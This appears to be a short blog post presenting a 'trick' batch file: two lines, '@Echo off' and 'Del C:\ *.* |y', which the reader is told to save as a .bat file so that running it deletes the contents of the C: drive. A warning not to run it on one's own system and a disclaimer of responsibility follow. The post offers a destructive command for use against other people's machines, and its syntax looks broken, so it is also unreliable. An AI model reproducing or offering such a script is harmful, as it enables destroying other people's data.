Batch file trick to delete C: drive


Type these commands in notepad

@Echo off
Del C:\ *.* |y


And save that as .bat 
not .txt and RUN IT
It will delete the content of C:\ drive...

PLEASE NOTE::::: don't run that .bat file on your system .... it will delete c:...




WE WILL NOT BE RESPONSIBLE FOR ANYTHING DONE BY USING THE INFORMATION GIVEN ABOVE...

0 comments: